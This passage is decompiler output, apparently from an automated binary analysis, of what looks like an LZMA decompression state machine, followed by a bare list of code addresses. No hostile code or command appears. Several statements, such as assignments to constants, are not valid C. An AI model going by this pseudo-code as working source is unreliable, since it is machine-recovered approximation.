                                                            											}
                                                            											__eax =  *(__ebp - 0x28);
                                                            											goto L88;
                                                            										case 0xb:
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												__ecx =  *(__ebp - 0x24);
                                                            												__eax =  *(__ebp - 0x20);
                                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                            											} else {
                                                            												__eax =  *(__ebp - 0x24);
                                                            											}
                                                            											__ecx =  *(__ebp - 0x28);
                                                            											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                            											L88:
                                                            											__ecx =  *(__ebp - 0x2c);
                                                            											 *(__ebp - 0x2c) = __eax;
                                                            											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                            											L89:
                                                            											__eax =  *(__ebp - 4);
                                                            											 *(__ebp - 0x80) = 0x15;
                                                            											__eax =  *(__ebp - 4) + 0xa68;
                                                            											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                            											goto L69;
                                                            										case 0xc:
                                                            											L99:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												 *(__ebp - 0x88) = 0xc;
                                                            												goto L170;
                                                            											}
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t334 = __ebp - 0x70;
                                                            											 *_t334 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t334;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											__eax =  *(__ebp - 0x2c);
                                                            											goto L101;
                                                            										case 0xd:
                                                            											L37:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												 *(__ebp - 0x88) = 0xd;
                                                            												goto L170;
                                                            											}
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t122 = __ebp - 0x70;
                                                            											 *_t122 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t122;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											L39:
                                                            											__eax =  *(__ebp - 0x40);
                                                            											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                            												goto L48;
                                                            											}
                                                            											__eflags = __ebx - 0x100;
                                                            											if(__ebx >= 0x100) {
                                                            												goto L54;
                                                            											}
                                                            											L41:
                                                            											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                            											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                            											__ecx =  *(__ebp - 0x58);
                                                            											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                            											 *(__ebp - 0x48) = __eax;
                                                            											__eax = __eax + 1;
                                                            											__eax = __eax << 8;
                                                            											__eax = __eax + __ebx;
                                                            											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            											__ax =  *__esi;
                                                            											 *(__ebp - 0x54) = __esi;
                                                            											__edx = __ax & 0x0000ffff;
                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            												__cx = __ax;
                                                            												 *(__ebp - 0x40) = 1;
                                                            												__cx = __ax >> 5;
                                                            												__eflags = __eax;
                                                            												__ebx = __ebx + __ebx + 1;
                                                            												 *__esi = __ax;
                                                            											} else {
                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                            												 *(__ebp - 0x10) = __ecx;
                                                            												0x800 = 0x800 - __edx;
                                                            												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                            												__ebx = __ebx + __ebx;
                                                            												 *__esi = __cx;
                                                            											}
                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            											 *(__ebp - 0x44) = __ebx;
                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                            												goto L39;
                                                            											} else {
                                                            												goto L37;
                                                            											}
                                                            										case 0xe:
                                                            											L46:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												 *(__ebp - 0x88) = 0xe;
                                                            												goto L170;
                                                            											}
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t156 = __ebp - 0x70;
                                                            											 *_t156 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t156;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											while(1) {
                                                            												L48:
                                                            												__eflags = __ebx - 0x100;
                                                            												if(__ebx >= 0x100) {
                                                            													break;
                                                            												}
                                                            												__eax =  *(__ebp - 0x58);
                                                            												__edx = __ebx + __ebx;
                                                            												__ecx =  *(__ebp - 0x10);
                                                            												__esi = __edx + __eax;
                                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                            												__ax =  *__esi;
                                                            												 *(__ebp - 0x54) = __esi;
                                                            												__edi = __ax & 0x0000ffff;
                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            													__cx = __ax;
                                                            													_t170 = __edx + 1; // 0x1
                                                            													__ebx = _t170;
                                                            													__cx = __ax >> 5;
                                                            													__eflags = __eax;
                                                            													 *__esi = __ax;
                                                            												} else {
                                                            													 *(__ebp - 0x10) = __ecx;
                                                            													0x800 = 0x800 - __edi;
                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            													__ebx = __ebx + __ebx;
                                                            													 *__esi = __cx;
                                                            												}
                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            												 *(__ebp - 0x44) = __ebx;
                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                            													continue;
                                                            												} else {
                                                            													goto L46;
                                                            												}
                                                            											}
                                                            											L54:
                                                            											_t173 = __ebp - 0x34;
                                                            											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                            											__eflags =  *_t173;
                                                            											goto L55;
                                                            										case 0xf:
                                                            											L58:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												 *(__ebp - 0x88) = 0xf;
                                                            												goto L170;
                                                            											}
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t203 = __ebp - 0x70;
                                                            											 *_t203 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t203;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											L60:
                                                            											__eflags = __ebx - 0x100;
                                                            											if(__ebx >= 0x100) {
                                                            												L55:
                                                            												__al =  *(__ebp - 0x44);
                                                            												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                            												goto L56;
                                                            											}
                                                            											L61:
                                                            											__eax =  *(__ebp - 0x58);
                                                            											__edx = __ebx + __ebx;
                                                            											__ecx =  *(__ebp - 0x10);
                                                            											__esi = __edx + __eax;
                                                            											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                            											__ax =  *__esi;
                                                            											 *(__ebp - 0x54) = __esi;
                                                            											__edi = __ax & 0x0000ffff;
                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            												__cx = __ax;
                                                            												_t217 = __edx + 1; // 0x1
                                                            												__ebx = _t217;
                                                            												__cx = __ax >> 5;
                                                            												__eflags = __eax;
                                                            												 *__esi = __ax;
                                                            											} else {
                                                            												 *(__ebp - 0x10) = __ecx;
                                                            												0x800 = 0x800 - __edi;
                                                            												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            												__ebx = __ebx + __ebx;
                                                            												 *__esi = __cx;
                                                            											}
                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            											 *(__ebp - 0x44) = __ebx;
                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                            												goto L60;
                                                            											} else {
                                                            												goto L58;
                                                            											}
                                                            										case 0x10:
                                                            											L109:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												 *(__ebp - 0x88) = 0x10;
                                                            												goto L170;
                                                            											}
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t365 = __ebp - 0x70;
                                                            											 *_t365 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t365;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											goto L111;
                                                            										case 0x11:
                                                            											L69:
                                                            											__esi =  *(__ebp - 0x58);
                                                            											 *(__ebp - 0x84) = 0x12;
                                                            											while(1) {
                                                            												 *(_t613 - 0x54) = _t606;
                                                            												goto L133;
                                                            											}
                                                            										case 0x12:
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												__eax =  *(__ebp - 0x58);
                                                            												 *(__ebp - 0x84) = 0x13;
                                                            												__esi =  *(__ebp - 0x58) + 2;
                                                            												while(1) {
                                                            													 *(_t613 - 0x54) = _t606;
                                                            													goto L133;
                                                            												}
                                                            											}
                                                            											__eax =  *(__ebp - 0x4c);
                                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                            											__ecx =  *(__ebp - 0x58);
                                                            											__eax =  *(__ebp - 0x4c) << 4;
                                                            											__eflags = __eax;
                                                            											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                            											goto L130;
                                                            										case 0x13:
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												_t469 = __ebp - 0x58;
                                                            												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                            												__eflags =  *_t469;
                                                            												 *(__ebp - 0x30) = 0x10;
                                                            												 *(__ebp - 0x40) = 8;
                                                            												L144:
                                                            												 *(__ebp - 0x7c) = 0x14;
                                                            												goto L145;
                                                            											}
                                                            											__eax =  *(__ebp - 0x4c);
                                                            											__ecx =  *(__ebp - 0x58);
                                                            											__eax =  *(__ebp - 0x4c) << 4;
                                                            											 *(__ebp - 0x30) = 8;
                                                            											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                            											L130:
                                                            											 *(__ebp - 0x58) = __eax;
                                                            											 *(__ebp - 0x40) = 3;
                                                            											goto L144;
                                                            										case 0x14:
                                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                            											__eax =  *(__ebp - 0x80);
                                                            											 *(_t613 - 0x88) = _t533;
                                                            											goto L1;
                                                            										case 0x15:
                                                            											__eax = 0;
                                                            											__eflags =  *(__ebp - 0x38) - 7;
                                                            											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                            											__al = __al & 0x000000fd;
                                                            											__eax = (__eflags >= 0) - 1 + 0xb;
                                                            											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                            											goto L120;
                                                            										case 0x16:
                                                            											__eax =  *(__ebp - 0x30);
                                                            											__eflags = __eax - 4;
                                                            											if(__eax >= 4) {
                                                            												_push(3);
                                                            												_pop(__eax);
                                                            											}
                                                            											__ecx =  *(__ebp - 4);
                                                            											 *(__ebp - 0x40) = 6;
                                                            											__eax = __eax << 7;
                                                            											 *(__ebp - 0x7c) = 0x19;
                                                            											 *(__ebp - 0x58) = __eax;
                                                            											goto L145;
                                                            										case 0x17:
                                                            											L145:
                                                            											__eax =  *(__ebp - 0x40);
                                                            											 *(__ebp - 0x50) = 1;
                                                            											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                            											goto L149;
                                                            										case 0x18:
                                                            											L146:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												 *(__ebp - 0x88) = 0x18;
                                                            												goto L170;
                                                            											}
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t484 = __ebp - 0x70;
                                                            											 *_t484 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t484;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											L148:
                                                            											_t487 = __ebp - 0x48;
                                                            											 *_t487 =  *(__ebp - 0x48) - 1;
                                                            											__eflags =  *_t487;
                                                            											L149:
                                                            											__eflags =  *(__ebp - 0x48);
                                                            											if( *(__ebp - 0x48) <= 0) {
                                                            												__ecx =  *(__ebp - 0x40);
                                                            												__ebx =  *(__ebp - 0x50);
                                                            												0 = 1;
                                                            												__eax = 1 << __cl;
                                                            												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                            												__eax =  *(__ebp - 0x7c);
                                                            												 *(__ebp - 0x44) = __ebx;
                                                            												while(1) {
                                                            													 *(_t613 - 0x88) = _t533;
                                                            													goto L1;
                                                            												}
                                                            											}
                                                            											__eax =  *(__ebp - 0x50);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                            											__eax =  *(__ebp - 0x58);
                                                            											__esi = __edx + __eax;
                                                            											 *(__ebp - 0x54) = __esi;
                                                            											__ax =  *__esi;
                                                            											__edi = __ax & 0x0000ffff;
                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            												__cx = __ax;
                                                            												__cx = __ax >> 5;
                                                            												__eax = __eax - __ecx;
                                                            												__edx = __edx + 1;
                                                            												__eflags = __edx;
                                                            												 *__esi = __ax;
                                                            												 *(__ebp - 0x50) = __edx;
                                                            											} else {
                                                            												 *(__ebp - 0x10) = __ecx;
                                                            												0x800 = 0x800 - __edi;
                                                            												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                            												 *__esi = __cx;
                                                            											}
                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                            												goto L148;
                                                            											} else {
                                                            												goto L146;
                                                            											}
                                                            										case 0x19:
                                                            											__eflags = __ebx - 4;
                                                            											if(__ebx < 4) {
                                                            												 *(__ebp - 0x2c) = __ebx;
                                                            												L119:
                                                            												_t393 = __ebp - 0x2c;
                                                            												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                            												__eflags =  *_t393;
                                                            												L120:
                                                            												__eax =  *(__ebp - 0x2c);
                                                            												__eflags = __eax;
                                                            												if(__eax == 0) {
                                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                            													goto L170;
                                                            												}
                                                            												__eflags = __eax -  *(__ebp - 0x60);
                                                            												if(__eax >  *(__ebp - 0x60)) {
                                                            													goto L171;
                                                            												}
                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                            												__eax =  *(__ebp - 0x30);
                                                            												_t400 = __ebp - 0x60;
                                                            												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                            												__eflags =  *_t400;
                                                            												goto L123;
                                                            											}
                                                            											__ecx = __ebx;
                                                            											__eax = __ebx;
                                                            											__ecx = __ebx >> 1;
                                                            											__eax = __ebx & 0x00000001;
                                                            											__ecx = (__ebx >> 1) - 1;
                                                            											__al = __al | 0x00000002;
                                                            											__eax = (__ebx & 0x00000001) << __cl;
                                                            											__eflags = __ebx - 0xe;
                                                            											 *(__ebp - 0x2c) = __eax;
                                                            											if(__ebx >= 0xe) {
                                                            												__ebx = 0;
                                                            												 *(__ebp - 0x48) = __ecx;
                                                            												L102:
                                                            												__eflags =  *(__ebp - 0x48);
                                                            												if( *(__ebp - 0x48) <= 0) {
                                                            													__eax = __eax + __ebx;
                                                            													 *(__ebp - 0x40) = 4;
                                                            													 *(__ebp - 0x2c) = __eax;
                                                            													__eax =  *(__ebp - 4);
                                                            													__eax =  *(__ebp - 4) + 0x644;
                                                            													__eflags = __eax;
                                                            													L108:
                                                            													__ebx = 0;
                                                            													 *(__ebp - 0x58) = __eax;
                                                            													 *(__ebp - 0x50) = 1;
                                                            													 *(__ebp - 0x44) = 0;
                                                            													 *(__ebp - 0x48) = 0;
                                                            													L112:
                                                            													__eax =  *(__ebp - 0x40);
                                                            													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                            													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                            														_t391 = __ebp - 0x2c;
                                                            														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                            														__eflags =  *_t391;
                                                            														goto L119;
                                                            													}
                                                            													__eax =  *(__ebp - 0x50);
                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                            													__eax =  *(__ebp - 0x58);
                                                            													__esi = __edi + __eax;
                                                            													 *(__ebp - 0x54) = __esi;
                                                            													__ax =  *__esi;
                                                            													__ecx = __ax & 0x0000ffff;
                                                            													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                            													__eflags =  *(__ebp - 0xc) - __edx;
                                                            													if( *(__ebp - 0xc) >= __edx) {
                                                            														__ecx = 0;
                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                            														__ecx = 1;
                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                            														__ebx = 1;
                                                            														__ecx =  *(__ebp - 0x48);
                                                            														__ebx = 1 << __cl;
                                                            														__ecx = 1 << __cl;
                                                            														__ebx =  *(__ebp - 0x44);
                                                            														__ebx =  *(__ebp - 0x44) | __ecx;
                                                            														__cx = __ax;
                                                            														__cx = __ax >> 5;
                                                            														__eax = __eax - __ecx;
                                                            														__edi = __edi + 1;
                                                            														__eflags = __edi;
                                                            														 *(__ebp - 0x44) = __ebx;
                                                            														 *__esi = __ax;
                                                            														 *(__ebp - 0x50) = __edi;
                                                            													} else {
                                                            														 *(__ebp - 0x10) = __edx;
                                                            														0x800 = 0x800 - __ecx;
                                                            														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                            														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                            														 *__esi = __dx;
                                                            													}
                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                            														L111:
                                                            														_t368 = __ebp - 0x48;
                                                            														 *_t368 =  *(__ebp - 0x48) + 1;
                                                            														__eflags =  *_t368;
                                                            														goto L112;
                                                            													} else {
                                                            														goto L109;
                                                            													}
                                                            												}
                                                            												__ecx =  *(__ebp - 0xc);
                                                            												__ebx = __ebx + __ebx;
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                            												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                            												 *(__ebp - 0x44) = __ebx;
                                                            												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                            													__ecx =  *(__ebp - 0x10);
                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                            													__ebx = __ebx | 0x00000001;
                                                            													__eflags = __ebx;
                                                            													 *(__ebp - 0x44) = __ebx;
                                                            												}
                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                            													L101:
                                                            													_t338 = __ebp - 0x48;
                                                            													 *_t338 =  *(__ebp - 0x48) - 1;
                                                            													__eflags =  *_t338;
                                                            													goto L102;
                                                            												} else {
                                                            													goto L99;
                                                            												}
                                                            											}
                                                            											__edx =  *(__ebp - 4);
                                                            											__eax = __eax - __ebx;
                                                            											 *(__ebp - 0x40) = __ecx;
                                                            											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                            											goto L108;
                                                            										case 0x1a:
                                                            											L56:
                                                            											__eflags =  *(__ebp - 0x64);
                                                            											if( *(__ebp - 0x64) == 0) {
                                                            												 *(__ebp - 0x88) = 0x1a;
                                                            												goto L170;
                                                            											}
                                                            											__ecx =  *(__ebp - 0x68);
                                                            											__al =  *(__ebp - 0x5c);
                                                            											__edx =  *(__ebp - 8);
                                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                            											 *( *(__ebp - 0x68)) = __al;
                                                            											__ecx =  *(__ebp - 0x14);
                                                            											 *(__ecx +  *(__ebp - 8)) = __al;
                                                            											__eax = __ecx + 1;
                                                            											__edx = 0;
                                                            											_t192 = __eax %  *(__ebp - 0x74);
                                                            											__eax = __eax /  *(__ebp - 0x74);
                                                            											__edx = _t192;
                                                            											goto L79;
                                                            										case 0x1b:
                                                            											L75:
                                                            											__eflags =  *(__ebp - 0x64);
                                                            											if( *(__ebp - 0x64) == 0) {
                                                            												 *(__ebp - 0x88) = 0x1b;
                                                            												goto L170;
                                                            											}
                                                            											__eax =  *(__ebp - 0x14);
                                                            											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            											__eflags = __eax -  *(__ebp - 0x74);
                                                            											if(__eax >=  *(__ebp - 0x74)) {
                                                            												__eax = __eax +  *(__ebp - 0x74);
                                                            												__eflags = __eax;
                                                            											}
                                                            											__edx =  *(__ebp - 8);
                                                            											__cl =  *(__eax + __edx);
                                                            											__eax =  *(__ebp - 0x14);
                                                            											 *(__ebp - 0x5c) = __cl;
                                                            											 *(__eax + __edx) = __cl;
                                                            											__eax = __eax + 1;
                                                            											__edx = 0;
                                                            											_t274 = __eax %  *(__ebp - 0x74);
                                                            											__eax = __eax /  *(__ebp - 0x74);
                                                            											__edx = _t274;
                                                            											__eax =  *(__ebp - 0x68);
                                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            											_t283 = __ebp - 0x64;
                                                            											 *_t283 =  *(__ebp - 0x64) - 1;
                                                            											__eflags =  *_t283;
                                                            											 *( *(__ebp - 0x68)) = __cl;
                                                            											L79:
                                                            											 *(__ebp - 0x14) = __edx;
                                                            											goto L80;
                                                            										case 0x1c:
                                                            											while(1) {
                                                            												L123:
                                                            												__eflags =  *(__ebp - 0x64);
                                                            												if( *(__ebp - 0x64) == 0) {
                                                            													break;
                                                            												}
                                                            												__eax =  *(__ebp - 0x14);
                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                            													__eflags = __eax;
                                                            												}
                                                            												__edx =  *(__ebp - 8);
                                                            												__cl =  *(__eax + __edx);
                                                            												__eax =  *(__ebp - 0x14);
                                                            												 *(__ebp - 0x5c) = __cl;
                                                            												 *(__eax + __edx) = __cl;
                                                            												__eax = __eax + 1;
                                                            												__edx = 0;
                                                            												_t414 = __eax %  *(__ebp - 0x74);
                                                            												__eax = __eax /  *(__ebp - 0x74);
                                                            												__edx = _t414;
                                                            												__eax =  *(__ebp - 0x68);
                                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                            												__eflags =  *(__ebp - 0x30);
                                                            												 *( *(__ebp - 0x68)) = __cl;
                                                            												 *(__ebp - 0x14) = _t414;
                                                            												if( *(__ebp - 0x30) > 0) {
                                                            													continue;
                                                            												} else {
                                                            													L80:
                                                            													 *(__ebp - 0x88) = 2;
                                                            													goto L1;
                                                            												}
                                                            											}
                                                            											 *(__ebp - 0x88) = 0x1c;
                                                            											goto L170;
                                                            									}
                                                            								}
                                                            								L171:
                                                            								_t535 = _t534 | 0xffffffff;
                                                            								goto L172;
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}













                                                            0x00406f06
                                                            0x00406f0b
                                                            0x00406f0d
                                                            0x00406f0f
                                                            0x00406f0f
                                                            0x00406f29
                                                            0x00406f30
                                                            0x00406f33
                                                            0x00000000
                                                            0x00406f35
                                                            0x00000000
                                                            0x00406f35
                                                            0x00406f33
                                                            0x00406f3a
                                                            0x00406f3a
                                                            0x00406f3a
                                                            0x00406f3a
                                                            0x00000000
                                                            0x00000000
                                                            0x00406f75
                                                            0x00406f75
                                                            0x00406f79
                                                            0x00407581
                                                            0x00000000
                                                            0x00407581
                                                            0x00406f7f
                                                            0x00406f82
                                                            0x00406f85
                                                            0x00406f89
                                                            0x00406f8c
                                                            0x00406f92
                                                            0x00406f94
                                                            0x00406f94
                                                            0x00406f94
                                                            0x00406f97
                                                            0x00406f9a
                                                            0x00406f9a
                                                            0x00406fa0
                                                            0x00406f3e
                                                            0x00406f3e
                                                            0x00406f41
                                                            0x00000000
                                                            0x00406f41
                                                            0x00406fa2
                                                            0x00406fa2
                                                            0x00406fa5
                                                            0x00406fa8
                                                            0x00406fab
                                                            0x00406fae
                                                            0x00406fb1
                                                            0x00406fb4
                                                            0x00406fb7
                                                            0x00406fba
                                                            0x00406fbd
                                                            0x00406fc0
                                                            0x00406fd8
                                                            0x00406fdb
                                                            0x00406fde
                                                            0x00406fe1
                                                            0x00406fe1
                                                            0x00406fe4
                                                            0x00406fe8
                                                            0x00406fea
                                                            0x00406fc2
                                                            0x00406fc2
                                                            0x00406fca
                                                            0x00406fcf
                                                            0x00406fd1
                                                            0x00406fd3
                                                            0x00406fd3
                                                            0x00406fed
                                                            0x00406ff4
                                                            0x00406ff7
                                                            0x00000000
                                                            0x00406ff9
                                                            0x00000000
                                                            0x00406ff9
                                                            0x00000000
                                                            0x00407286
                                                            0x00407286
                                                            0x0040728a
                                                            0x004075b1
                                                            0x00000000
                                                            0x004075b1
                                                            0x00407290
                                                            0x00407293
                                                            0x00407296
